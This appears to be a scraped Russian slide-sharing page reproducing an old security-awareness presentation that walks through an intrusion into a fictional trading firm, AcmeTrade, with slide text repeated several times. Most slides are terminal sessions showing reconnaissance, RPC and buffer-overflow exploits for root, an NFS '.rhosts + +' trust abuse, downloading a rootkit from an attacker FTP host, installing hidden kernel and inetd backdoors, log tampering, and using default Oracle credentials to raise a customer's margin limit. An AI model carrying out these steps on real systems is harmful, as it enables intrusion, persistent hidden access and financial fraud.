Пример атаки

Август 30, 2022

Главная
Информатика
Пример атаки

Содержание

4. ACMETRADE.COM
5. Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338 Domain Name: ACMETRADE.COM Administrative Contact:
6. hacker:/export/home/hacker> ./rpcscan dns.acmetrade.com cmsd Scanning dns.acmetrade.com for program 100068 cmsd is on port 33505 hacker:/export/home/hacker>
9. hacker:/export/home/hacker> id uid=1002(hacker) gid=10(staff) hacker:/export/home/hacker> uname -a SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Engine hacker:/export/home/hacker> ./cmsd
10. # # nslookup Default Server: dns.acmetrade.com Address: 208.21.2.67 > > ls acmetrade.com Received 15 records. ^D
11. # # # # rpcinfo -p www.acmetrade.com | grep mountd 100005 1 udp 643 mountd 100005
12. nfs
13. nfsshell.c
14. /data1 server2 /a engineering /b engineering /c engineering /export/home (everyone) Export list for www1.acmetrade.com: nfs> mount
15. nfs> status User id : 201 Group id : 1 Remote host : ‘www1.acmetrade.com’ Mount path
18. www1% www1% ls -la /usr/bin/eject -r-sr-xr-x 1 root bin 13144 Jul 15 1997 /usr/bin/eject* www1% gcc
19. ftp> cd solaris_backdoors 250 CWD command successful. ftp> get solaris_backdoor.tar.gz 200 PORT command successful. 150 Binary
20. # cd /tmp/my_tools/module_backdoor # ./configure Enter directories and filenames to hide from ls, find, du: #
21. # ls -la /usr/local/share/... ...: No such file or directory # # # # # #
22. # netstat TCP Local Address Remote Address Swind Send-Q Rwind Recv-Q State -------------------- -------------------- ----- ------
23. Trying 208.21.2.12... Escape character is '^]'. telnet www1.acmetrade.com 31337 Granting rootshell... # hostname www1 # whoami
24. hacker:/export/home/hacker> ftp www1.acmetrade.com Connected to www1 220 www1.acmetrade.com FTP service (Version 2.5). Name: root 331 Password
25. program vers proto port service 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000
26. 100021 3 udp 4045 nlockmgr 100021 4 udp 4045 nlockmgr 100021 1 tcp 4045 nlockmgr 100021
27. Please wait for your root shell. # ./tt backoffice.acmetrade.com hostname backoffice whoami root # find /
28. # sqlplus oracle/oracle SQL> describe customers Name Null? Type ------------------ -------- ----------- LNAME NOT NULL VARCHAR2(20)
30. Anatomy of the Attack AcmeTrade’s Network UNIX Firewall DNS Server Web Server Filtering Router NT Clients
31. IT Infrastructure Firewall E-Mail Server Web Server Router Servers Clients & Workstations Network What is Vulnerable?
32. Applications Router E-Commerce Web Server E-Mail Server Firewall SAP Peoplesoft Web Browsers What is Vulnerable?
33. Databases Firewall Router Oracle Microsoft SQL Server Sybase What is Vulnerable?
34. Firewall AIX Solaris Router Windows NT Network Operating Systems HP-UX Windows 95 & NT What is
36. Скачать презентацию

Слайд 2

Слайд 3

Слайд 4

ACMETRADE.COM

Слайд 5

Registrant:
Acmetrade.com, Inc. (ACMETRADE-DOM)
6600 Peachtree Dunwoody Road
Atlanta, GA 30338
Domain

Name: ACMETRADE.COM
Administrative Contact:
Vaughn, Danon (ES2394) dvaughn@ACMETRADE.COM
(678)443-6000 (FAX) (678) 443-6476
Technical Contact, Zone Contact:
Bergman, Bret (ET2324) bbergman@ACMETRADE.COM
(678)443-6100 (FAX) (678) 443-6208
Billing Contact:
Fields, Hope (ET3427) hfields@ACMETRADE.COM
(678)443-6101 (FAX) (678) 443-6401
Record Last updated on 27-Jul-99.
Record created on 06-Mar-98.
Database last updated on 4-Oct-99 09:09:01 EDT
Domain servers in listed order:
dns.acmetrade.com 208.21.2.67
www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103

http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com

Слайд 6

hacker:/export/home/hacker>
./rpcscan dns.acmetrade.com cmsd
Scanning dns.acmetrade.com for program 100068
cmsd is on port 33505
hacker:/export/home/hacker>

Слайд 7

Слайд 8

Слайд 9

hacker:/export/home/hacker>
id
uid=1002(hacker) gid=10(staff)
hacker:/export/home/hacker>
uname -a
SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Engine
hacker:/export/home/hacker>
./cmsd dns.acmetrade.com
using source

port 53
rtable_create worked
Exploit successful. Portshell created on port 33505

hacker:/export/home/hacker>

Trying 208.21.2.67...
Connected to dns.acmetrade.com.
Escape character is '^]'.

uid=0(root) gid=0(root)

uname -a

SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5

telnet dns.acmetrade.com 33505

Слайд 10

#
#
nslookup
Default Server: dns.acmetrade.com
Address: 208.21.2.67
>
>
ls acmetrade.com
Received 15 records.
^D
[dns.acmetrade.com]
www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103
margin.acmetrade.com 208.21.4.10
marketorder.acmetrade.com 208.21.2.62
deriv.acmetrade.com 208.21.2.25
deriv1.acmetrade.com 208.21.2.13
bond.acmetrade.com 208.21.2.33
ibd.acmetrade.com 208.21.2.27
fideriv.acmetrade.com 208.21.4.42
backoffice.acmetrade.com 208.21.4.45
wiley.acmetrade.com 208.21.2.29
bugs.acmetrade.com 208.21.2.89
fw.acmetrade.com 208.21.2.94
fw1.acmetrade.com 208.21.2.21

Слайд 11

#
#
#
#
rpcinfo -p www.acmetrade.com | grep mountd
100005 1 udp 643 mountd
100005 1

tcp 647 mountd

showmount -e www.acmetrade.com

/usr/local server2, server3, server4
/export/home sunspot

rpcinfo -p www1.acmetrade.com | grep mountd

100005 1 udp 643 mountd
100005 1 tcp 647 mountd

showmount -e www1.acmetrade.com

/data1 server2
/a engineering
/b engineering
/c engineering
/export/home (everyone)

export list for www.acmetrade.com:

Слайд 12

nfs

Слайд 13

nfsshell.c

Слайд 14

/data1 server2
/a engineering
/b engineering
/c engineering
/export/home (everyone)
Export list for www1.acmetrade.com:
nfs>
mount /export/home
Mount www1.acmetrade.com[208.21.2.12]:/export/home
nfs>
ls
bill
bob
celeste
chuck
dan
dave
jenn
zack
nfs>
ls –l bob
drwxr-xr-x 2 201

1 1024 May 4 1999 bob

- protocol: UDP/IP
- transfer size: 8192 bytes

nfs>

cd bob

uid 201

gid 1

nfsshell

nfs>

host www1.acmetrade.com

Open www1.acmetrade.com[208.21.1.12] (mountd) using UDP/IP

nfs>

export

Слайд 15

nfs>
status
User id : 201
Group id : 1
Remote host : ‘www1.acmetrade.com’
Mount path

: ‘/export/home’
Transfer size: 8192

nfs>

!sh

echo "+ +" > .rhosts

exit

nfs>

put .rhosts

cat .rhosts

+ +

nfs>

exit

rlogin -l bob www1.acmetrade.com

Last login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.com

www1%

whoami

bob

www1%

pwd

/export/home/bob

www1%

uname -a

SunOS www1.acmetrade.com 5.5.1 Generic_103640-24 sun4d SUNW,SPARCserver-1000

www1%

cat .rhosts

+ +

Слайд 16

Слайд 17

Слайд 18

www1%
www1%
ls -la /usr/bin/eject
-r-sr-xr-x 1 root bin 13144 Jul 15 1997 /usr/bin/eject*
www1%
gcc

-o eject_overflow eject_overflow.c

www1%

./eject_overflow

Jumping to address 0xeffff630 B[364] E[400] SO[400]

whoami

root

ftp evil.hacker.com

Connected to evil.hacker.com.

Name (evil.hacker.com:root):

331 Password required for hacker.

Password:

230 User hacker logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

hacker

eye0wnu

220 evil.hacker.com FTP server (HackerOS) ready.

Слайд 19

ftp>
cd solaris_backdoors
250 CWD command successful.
ftp>
get solaris_backdoor.tar.gz
200 PORT command successful.
150 Binary data

connection for out 3.1.33.7,1152).

226 Transfer complete.

152323 bytes sent in 31.942233 secs (4.7Kbytes/sec)

ftp>

quit

tar -xf module_backdoor.tar

cd /tmp/my_tools

gunzip module_backdoor.tar.gz

Слайд 20

#
cd /tmp/my_tools/module_backdoor
#
./configure
Enter directories and filenames to hide from ls, find, du:
#
make
gcc

-c backdoor.c
gcc -o installer installer.c
ld –o backdoor –r backdoor.o

Makefile
backdoor
backdoor.c
backdoor.o
config.h
configure
installer
installer.c

modload backdoor

./installer -d /usr/local/share/...

Adding directory...
Fixing last modified time...
Fixing last accessed time...

... backdoor

Enter class C network to hide from netstat:

Enter process names to hide from ps and lsof:

creating config.h...

3.1.33.0

sniffer

Слайд 21

#
ls -la /usr/local/share/...
...: No such file or directory
#
#
#
#
#
#
./installer backdoor /usr/local/share/.../backdoor
Installing file...
Fixing

last modified time...
Fixing last accessed time...

echo "/usr/sbin/modload /usr/local/share/.../backdoor" >>/etc/init.d/utmpd

cd ..

rm -rf module_backdoor

inetd_backdoor/
logedit
sniffer

./installer sniffer /usr/local/share/.../sniffer

Installing file...
Fixing last modified time...
Fixing last accessed time...

ls /usr/local/share/.../sniffer

/usr/local/share/.../sniffer: No such file or directory

cd /usr/local/share/...

./sniffer > out &

ps -aef | grep sniffer

Слайд 22

#
netstat
TCP
Local Address Remote Address Swind Send-Q Rwind Recv-Q State
-------------------- --------------------

----- ------ ----- ------ -------
208.21.2.10.1023 208.21.0.19.2049 8760 0 8760 648 ESTABLISHED
208.21.2.10.1022 208.21.0.19.2049 8760 0 8760 0 ESTABLISHED
208.21.2.10.2049 208.21.0.13.1003 8760 0 8760 0 ESTABLISHED

cd /tmp/my_tools

cd inetd_backdoor

config.h
configure
inetd.c
installer.c

./configure

Enter port for hidden shell:

make

gcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolv
gcc -o installer installer.c

installer inetd /usr/sbin/inetd

Installing file...
Fixing last modified time...
Fixing last accessed time...

creating config.h...
creating Makefile...

31337

Слайд 23

Trying 208.21.2.12...
Escape character is '^]'.
telnet www1.acmetrade.com 31337
Granting rootshell...
#
hostname
www1
#
whoami
root
#
#
ps –aef | grep

inetd

root 179 1 0 May 10 ? 1:26 /usr/sbin/inetd -s

kill –9 179

exit

/usr/sbin/inetd –s &

Connection closed by foreign host.

hacker:/export/home/hacker>

Слайд 24

hacker:/export/home/hacker>
ftp www1.acmetrade.com
Connected to www1
220 www1.acmetrade.com FTP service (Version 2.5).
Name:
root
331 Password required

for root.

Password:

*******

230 User root logged in.

Remote system type is Unix.

ftp>

put backdoor.html securelogin.html

200 PORT command successful.

150 Opening BINARY mode data connection for index.html

226 Transfer complete.

ftp>

quit

200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x 9 root other 1024 Aug 17 17:07 .
-rwxr-xr-x 9 root other 1024 Aug 17 17:07 ..
-rwxr-xr-x 2 www www 2034 Aug 17 17:07 index.html
-rwxr-xr-x 2 www www 1244 Aug 17 17:07 securelogin.html
-rwxr-xr-x 2 www www 1024 Aug 17 17:07 image2.gif
-rwxr-x--x 6 www www 877 Aug 17 17:07 title.gif
-rwxr-xr-x 2 www www 1314 Aug 17 17:07 frontpage.jpg
226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)

ftp>

dir

ftp> cd /usr/local/httpd

Слайд 25

program vers proto port service
100000 4 tcp 111 rpcbind

100000 3 tcp 111 rpcbind
100000 2 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100000 3 udp 111 rpcbind
100000 2 udp 111 rpcbind
100004 2 udp 753 ypserv
100004 1 udp 753 ypserv
100004 1 tcp 754 ypserv
100004 2 tcp 32771 ypserv
1073741824 2 udp 32772
100007 3 udp 32779 ypbind
100007 2 udp 32779 ypbind
100007 1 udp 32779 ypbind
100007 3 tcp 32772 ypbind
100007 2 tcp 32772 ypbind
100007 1 tcp 32772 ypbind
100011 1 udp 32781 rquotad
100068 2 udp 32783
100068 3 udp 32783
100068 4 udp 32783
100068 5 udp 32783
100024 1 udp 32784 status
100024 1 tcp 32777 status
100021 1 udp 4045 nlockmgr
100021 2 udp 4045 nlockmgr

rpcinfo -p backoffice.acmetrade.com

Слайд 26

100021 3 udp 4045 nlockmgr
100021 4 udp 4045 nlockmgr

100021 1 tcp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100021 3 tcp 4045 nlockmgr
100021 4 tcp 4045 nlockmgr
100005 1 udp 33184 mountd
100005 2 udp 33184 mountd
100005 3 udp 33184 mountd
100005 1 tcp 32787 mountd
100005 2 tcp 32787 mountd
100005 3 tcp 32787 mountd
100083 1 tcp 32773
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100227 2 udp 2049 nfs_acl
100227 3 udp 2049 nfs_acl
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100227 2 tcp 2049 nfs_acl
100227 3 tcp 2049 nfs_acl

grep ttdbserverd /etc/inetd.conf

100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd

rpcinfo -p backoffice.acmetrade.com | grep 100083

100083 1 tcp 32773

cd /tmp/mytools/warez

Слайд 27

Please wait for your root shell.
#
./tt backoffice.acmetrade.com
hostname
backoffice
whoami
root
#
find / -type f -name

.rhosts -print

/.rhosts
/export/home/chuck/.rhosts
/export/home/bill/.rhosts
/export/home/larry/.rhosts

cat /.rhosts

fideriv.acmetrade root
ibd.acmetrade root
bugs.acmetrade root

10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03
User tty login@ idle JCPU PCPU what
root console 9:27am 147:52 14:41 14:14 /sbin/sh
root pts/5 9:24pm /sbin/sh

/tmp/mytools/logedit root pts/5

10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03
User tty login@ idle JCPU PCPU what
root console 9:27am 147:52 14:41 14:14 /sbin/sh

Слайд 28

#
sqlplus oracle/oracle
SQL>
describe customers
Name Null? Type
------------------ -------- -----------
LNAME NOT NULL VARCHAR2(20)
FNAME NOT NULL VARCHAR2(15)
ADDR1 NOT NULL VARCHAR2(30)
ZIP NOT

NULL NUMBER(5)
PHONE NOT NULL CHAR(12)
ACCOUNT_NUM NOT NULL NUMBER(12)
BALANCE NOT NULL NUMBER(12)
MARGIN_LIMIT NOT NULL NUMBER(12)
ACCT_OPEN NOT NULL DATE
SQL>

select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME FNAME ACCOUNT_NUM MARGIN_LIMIT
-------------------- ------------- ----------- ------------
Gerulski David 5820981 50000.00
SQL>

update customers set MARGIN_LIMIT = 500000.00 where LNAME = 'Gerulski';

SQL>

select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME MARGIN_LIMIT
------------------- ------------
Gerulski 500000.00
SQL>

exit

Слайд 29

Слайд 30

Anatomy of the Attack
AcmeTrade’s Network
UNIX
Firewall
DNS Server
Web Server
Filtering Router
NT
Clients & Workstations
Network
UNIX
NT
UNIX

Слайд 31

IT Infrastructure
Firewall
E-Mail Server
Web Server
Router
Servers
Clients & Workstations
Network
What is Vulnerable?

Слайд 32

Applications
Router
E-Commerce
Web Server
E-Mail Server
Firewall
SAP
Peoplesoft
Web Browsers
What is Vulnerable?

Слайд 33

Databases
Firewall
Router
Oracle
Microsoft
SQL Server
Sybase
What is Vulnerable?

Слайд 34

Пример атаки

Содержание

ACMETRADE.COM

Registrant:Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338 Domain

hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsdScanning dns.acmetrade.com for program 100068cmsd is on port 33505hacker:/export/home/hacker>

hacker:/export/home/hacker>iduid=1002(hacker) gid=10(staff)hacker:/export/home/hacker>uname -aSunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Enginehacker:/export/home/hacker>./cmsd dns.acmetrade.comusing source

####rpcinfo -p www.acmetrade.com | grep mountd100005 1 udp 643 mountd100005 1

nfs

nfsshell.c

/data1 server2/a engineering/b engineering/c engineering/export/home (everyone)Export list for www1.acmetrade.com:nfs>mount /export/homeMount www1.acmetrade.com[208.21.2.12]:/export/homenfs>lsbill bobcelestechuckdandavejennzacknfs>ls –l bobdrwxr-xr-x 2 201

nfs>statusUser id : 201Group id : 1Remote host : ‘www1.acmetrade.com’Mount path

www1%www1%ls -la /usr/bin/eject-r-sr-xr-x 1 root bin 13144 Jul 15 1997 /usr/bin/eject*www1%gcc

ftp>cd solaris_backdoors250 CWD command successful.ftp>get solaris_backdoor.tar.gz200 PORT command successful.150 Binary data

#cd /tmp/my_tools/module_backdoor#./configureEnter directories and filenames to hide from ls, find, du:#makegcc

#ls -la /usr/local/share/......: No such file or directory######./installer backdoor /usr/local/share/.../backdoorInstalling file...Fixing

#netstatTCP Local Address Remote Address Swind Send-Q Rwind Recv-Q State-------------------- --------------------

Trying 208.21.2.12...Escape character is '^]'.telnet www1.acmetrade.com 31337Granting rootshell...#hostnamewww1#whoamiroot##ps –aef | grep

hacker:/export/home/hacker>ftp www1.acmetrade.comConnected to www1220 www1.acmetrade.com FTP service (Version 2.5).Name:root331 Password required

program vers proto port service 100000 4 tcp 111 rpcbind

100021 3 udp 4045 nlockmgr 100021 4 udp 4045 nlockmgr

Please wait for your root shell.#./tt backoffice.acmetrade.comhostnamebackofficewhoamiroot#find / -type f -name

#sqlplus oracle/oracleSQL>describe customersName Null? Type------------------ -------- -----------LNAME NOT NULL VARCHAR2(20)FNAME NOT NULL VARCHAR2(15)ADDR1 NOT NULL VARCHAR2(30)ZIP NOT

Anatomy of the AttackAcmeTrade’s NetworkUNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIX

IT InfrastructureFirewallE-Mail ServerWeb ServerRouterServersClients & WorkstationsNetworkWhat is Vulnerable?

ApplicationsRouterE-CommerceWeb ServerE-Mail ServerFirewallSAPPeoplesoftWeb BrowsersWhat is Vulnerable?

DatabasesFirewallRouterOracleMicrosoftSQL ServerSybaseWhat is Vulnerable?

FirewallAIXSolarisRouterWindows NTNetworkOperating SystemsHP-UXWindows 95 & NTWhat is Vulnerable?

Похожие презентации

Registrant:
Acmetrade.com, Inc. (ACMETRADE-DOM)
6600 Peachtree Dunwoody Road
Atlanta, GA 30338
Domain

hacker:/export/home/hacker>
./rpcscan dns.acmetrade.com cmsd
Scanning dns.acmetrade.com for program 100068
cmsd is on port 33505
hacker:/export/home/hacker>

hacker:/export/home/hacker>
id
uid=1002(hacker) gid=10(staff)
hacker:/export/home/hacker>
uname -a
SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Engine
hacker:/export/home/hacker>
./cmsd dns.acmetrade.com
using source

#
#
#
#
rpcinfo -p www.acmetrade.com | grep mountd
100005 1 udp 643 mountd
100005 1

/data1 server2
/a engineering
/b engineering
/c engineering
/export/home (everyone)
Export list for www1.acmetrade.com:
nfs>
mount /export/home
Mount www1.acmetrade.com[208.21.2.12]:/export/home
nfs>
ls
bill
bob
celeste
chuck
dan
dave
jenn
zack
nfs>
ls –l bob
drwxr-xr-x 2 201

nfs>
status
User id : 201
Group id : 1
Remote host : ‘www1.acmetrade.com’
Mount path

www1%
www1%
ls -la /usr/bin/eject
-r-sr-xr-x 1 root bin 13144 Jul 15 1997 /usr/bin/eject*
www1%
gcc

ftp>
cd solaris_backdoors
250 CWD command successful.
ftp>
get solaris_backdoor.tar.gz
200 PORT command successful.
150 Binary data

#
cd /tmp/my_tools/module_backdoor
#
./configure
Enter directories and filenames to hide from ls, find, du:
#
make
gcc

#
ls -la /usr/local/share/...
...: No such file or directory
#
#
#
#
#
#
./installer backdoor /usr/local/share/.../backdoor
Installing file...
Fixing

#
netstat
TCP
Local Address Remote Address Swind Send-Q Rwind Recv-Q State
-------------------- --------------------

Trying 208.21.2.12...
Escape character is '^]'.
telnet www1.acmetrade.com 31337
Granting rootshell...
#
hostname
www1
#
whoami
root
#
#
ps –aef | grep

hacker:/export/home/hacker>
ftp www1.acmetrade.com
Connected to www1
220 www1.acmetrade.com FTP service (Version 2.5).
Name:
root
331 Password required

program vers proto port service
100000 4 tcp 111 rpcbind

100021 3 udp 4045 nlockmgr
100021 4 udp 4045 nlockmgr

Please wait for your root shell.
#
./tt backoffice.acmetrade.com
hostname
backoffice
whoami
root
#
find / -type f -name

#
sqlplus oracle/oracle
SQL>
describe customers
Name Null? Type
------------------ -------- -----------
LNAME NOT NULL VARCHAR2(20)
FNAME NOT NULL VARCHAR2(15)
ADDR1 NOT NULL VARCHAR2(30)
ZIP NOT

Anatomy of the Attack
AcmeTrade’s Network
UNIX
Firewall
DNS Server
Web Server
Filtering Router
NT
Clients & Workstations
Network
UNIX
NT
UNIX

IT Infrastructure
Firewall
E-Mail Server
Web Server
Router
Servers
Clients & Workstations
Network
What is Vulnerable?

Applications
Router
E-Commerce
Web Server
E-Mail Server
Firewall
SAP
Peoplesoft
Web Browsers
What is Vulnerable?

Databases
Firewall
Router
Oracle
Microsoft
SQL Server
Sybase
What is Vulnerable?

Firewall
AIX
Solaris
Router
Windows NT
Network
Operating Systems
HP-UX
Windows 95 & NT
What is Vulnerable?